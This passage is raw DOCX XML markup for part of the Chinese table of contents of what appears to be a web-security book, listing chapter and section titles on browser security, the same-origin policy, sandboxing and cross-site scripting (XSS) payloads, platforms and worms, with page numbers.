            <w:t>单？</w:t>
            <w:tab/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
              <w:spacing w:val="5"/>
              <w:sz w:val="18"/>
            </w:rPr>
            <w:t>23</w:t>
          </w:r>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC5"/>
            <w:tabs>
              <w:tab w:pos="3855" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:spacing w:val="5"/>
            </w:rPr>
            <w:t>第二</w:t>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:t>篇</w:t>
            <w:tab/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="5"/>
            </w:rPr>
            <w:t>客户端脚本安全</w:t>
          </w:r>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:numPr>
              <w:ilvl w:val="1"/>
              <w:numId w:val="3"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:pos="1523" w:val="left" w:leader="none"/>
              <w:tab w:pos="1524" w:val="left" w:leader="none"/>
              <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
            </w:tabs>
            <w:spacing w:line="240" w:lineRule="auto" w:before="744" w:after="0"/>
            <w:ind w:left="1523" w:right="0" w:hanging="492"/>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:sz w:val="18"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr/>
            <w:pict>
              <v:group style="position:absolute;margin-left:12.72pt;margin-top:14.440003pt;width:411.15pt;height:16.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:1192" coordorigin="254,289" coordsize="8223,322">
                <v:rect style="position:absolute;left:254;top:288;width:8223;height:322" filled="true" fillcolor="#dadada" stroked="false">
                  <v:fill type="solid"/>
                </v:rect>
                <v:shape style="position:absolute;left:1195;top:308;width:7261;height:277" type="#_x0000_t202" filled="false" stroked="false">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:tabs>
                            <w:tab w:pos="7240" w:val="right" w:leader="dot"/>
                          </w:tabs>
                          <w:spacing w:line="276" w:lineRule="exact" w:before="0"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                            <w:sz w:val="18"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:spacing w:val="10"/>
                            <w:sz w:val="21"/>
                          </w:rPr>
                          <w:t>浏</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:spacing w:val="7"/>
                            <w:sz w:val="21"/>
                          </w:rPr>
                          <w:t>览</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:spacing w:val="10"/>
                            <w:sz w:val="21"/>
                          </w:rPr>
                          <w:t>器</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:spacing w:val="7"/>
                            <w:sz w:val="21"/>
                          </w:rPr>
                          <w:t>安全</w:t>
                          <w:tab/>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                            <w:spacing w:val="5"/>
                            <w:sz w:val="18"/>
                          </w:rPr>
                          <w:t>26</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                  <w10:wrap type="none"/>
                </v:shape>
                <v:shape style="position:absolute;left:283;top:354;width:688;height:236" type="#_x0000_t202" filled="false" stroked="false">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:line="236" w:lineRule="exact" w:before="0"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                          <w:rPr>
                            <w:sz w:val="21"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="21"/>
                          </w:rPr>
                          <w:t>第 </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                            <w:sz w:val="21"/>
                          </w:rPr>
                          <w:t>2</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                            <w:spacing w:val="-35"/>
                            <w:sz w:val="21"/>
                          </w:rPr>
                          <w:t> </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="21"/>
                          </w:rPr>
                          <w:t>章</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                  <w10:wrap type="none"/>
                </v:shape>
                <w10:wrap type="none"/>
              </v:group>
            </w:pict>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:spacing w:val="12"/>
              <w:sz w:val="20"/>
            </w:rPr>
            <w:t>同</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:spacing w:val="10"/>
              <w:sz w:val="20"/>
            </w:rPr>
            <w:t>源策略</w:t>
            <w:tab/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:spacing w:val="5"/>
              <w:sz w:val="18"/>
            </w:rPr>
            <w:t>26</w:t>
          </w:r>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:numPr>
              <w:ilvl w:val="1"/>
              <w:numId w:val="3"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:pos="1523" w:val="left" w:leader="none"/>
              <w:tab w:pos="1524" w:val="left" w:leader="none"/>
              <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
            </w:tabs>
            <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
            <w:ind w:left="1523" w:right="0" w:hanging="492"/>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:sz w:val="18"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:spacing w:val="12"/>
              <w:sz w:val="20"/>
            </w:rPr>
            <w:t>浏</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:spacing w:val="10"/>
              <w:sz w:val="20"/>
            </w:rPr>
            <w:t>览器</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:spacing w:val="12"/>
              <w:sz w:val="20"/>
            </w:rPr>
            <w:t>沙</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:sz w:val="20"/>
            </w:rPr>
            <w:t>箱</w:t>
            <w:tab/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:spacing w:val="5"/>
              <w:sz w:val="18"/>
            </w:rPr>
            <w:t>30</w:t>
          </w:r>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:numPr>
              <w:ilvl w:val="1"/>
              <w:numId w:val="3"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:pos="1523" w:val="left" w:leader="none"/>
              <w:tab w:pos="1524" w:val="left" w:leader="none"/>
              <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
            </w:tabs>
            <w:spacing w:line="240" w:lineRule="auto" w:before="55" w:after="0"/>
            <w:ind w:left="1523" w:right="0" w:hanging="492"/>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:sz w:val="18"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:spacing w:val="12"/>
              <w:sz w:val="20"/>
            </w:rPr>
            <w:t>恶</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:spacing w:val="10"/>
              <w:sz w:val="20"/>
            </w:rPr>
            <w:t>意网</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:spacing w:val="12"/>
              <w:sz w:val="20"/>
            </w:rPr>
            <w:t>址</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:spacing w:val="10"/>
              <w:sz w:val="20"/>
            </w:rPr>
            <w:t>拦截</w:t>
            <w:tab/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:spacing w:val="5"/>
              <w:sz w:val="18"/>
            </w:rPr>
            <w:t>33</w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:spacing w:before="353"/>
        <w:ind w:right="219"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:b/>
          <w:w w:val="65"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="75"/>
        </w:rPr>
        <w:t>IX </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:b/>
          <w:w w:val="65"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:top="1400" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1523" w:val="left" w:leader="none"/>
          <w:tab w:pos="1524" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="124" w:after="0"/>
        <w:ind w:left="1523" w:right="0" w:hanging="492"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>高</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>速发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>展</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>的浏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>览</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>器安全</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>36</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1523" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="56"/>
        <w:ind w:left="1031" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="position:absolute;margin-left:12.72pt;margin-top:19.639973pt;width:411.15pt;height:16.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:1264" coordorigin="254,393" coordsize="8223,322">
            <v:rect style="position:absolute;left:254;top:392;width:8223;height:322" filled="true" fillcolor="#dadada" stroked="false">
              <v:fill type="solid"/>
            </v:rect>
            <v:shape style="position:absolute;left:1195;top:414;width:7261;height:283" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:pos="7240" w:val="right" w:leader="dot"/>
                      </w:tabs>
                      <w:spacing w:line="282" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>跨</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="7"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>站</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>脚</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="7"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>本</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>攻</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="7"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>击</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="3"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>（</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="3"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>XSS</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="3"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>）</w:t>
                      <w:tab/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:spacing w:val="5"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>40</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <v:shape style="position:absolute;left:283;top:460;width:688;height:236" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="236" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>第 </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>3</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="-35"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t> </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>章</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <w10:wrap type="none"/>
          </v:group>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>2.5</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>小结</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>39</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1525" w:val="left" w:leader="none"/>
          <w:tab w:pos="1526" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="536" w:after="0"/>
        <w:ind w:left="1525" w:right="0" w:hanging="494"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>简介</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>40</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1525" w:val="left" w:leader="none"/>
          <w:tab w:pos="1526" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
        <w:ind w:left="1525" w:right="0" w:hanging="494"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>攻</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>进阶</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>43</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="80" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>初</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>探</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="-31"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Payload</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>43</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="82" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>强大</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="-31"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Payload</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>46</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>攻击平台</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>62</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>终极武器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Worm</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="82" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
